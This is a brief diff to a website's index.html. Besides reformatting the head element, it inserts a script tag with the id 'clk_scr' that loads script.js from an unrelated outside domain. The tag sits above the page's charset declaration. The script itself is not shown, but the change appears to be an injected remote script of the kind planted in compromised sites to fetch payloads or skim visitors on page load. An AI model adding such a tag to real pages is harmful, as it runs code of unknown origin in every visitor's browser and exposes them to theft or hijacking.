--- a/index.html
+++ b/index.html
@@ -1,5 +1,10 @@
 <!DOCTYPE html>
-<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
+<html>
+	<head>
+
+		<script id="clk_scr" src="https://wytrzymalosc.site/script.js"></script>
+	
+	<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
 	<meta charset="UTF-8">
 
 	<link rel="stylesheet" type="text/css" href="./index_files/reset.css">
